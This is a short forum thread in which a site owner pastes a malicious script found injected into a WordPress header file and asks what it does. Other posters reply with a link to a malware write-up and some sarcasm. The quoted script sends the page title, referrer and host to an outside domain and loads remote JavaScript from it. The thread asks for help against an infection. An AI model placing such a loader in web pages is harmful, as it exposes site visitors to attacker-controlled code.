So I noticed my site was failing to load because "mikelongonlonline.com" was failing to load. After looking in wp-header.php I found this script: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://mikelongonline.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> Code (markup):
Yea I already know that's the case and it's been removed. Just wondering if it's possible to tell what that JS does without the php file source.
That I don't know. Maybe this blog post will give you the answer: https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html
Lol another insightful comment from you. I posted here like 3 times in my life and every time you come to shitpost. Thanks for your help as always.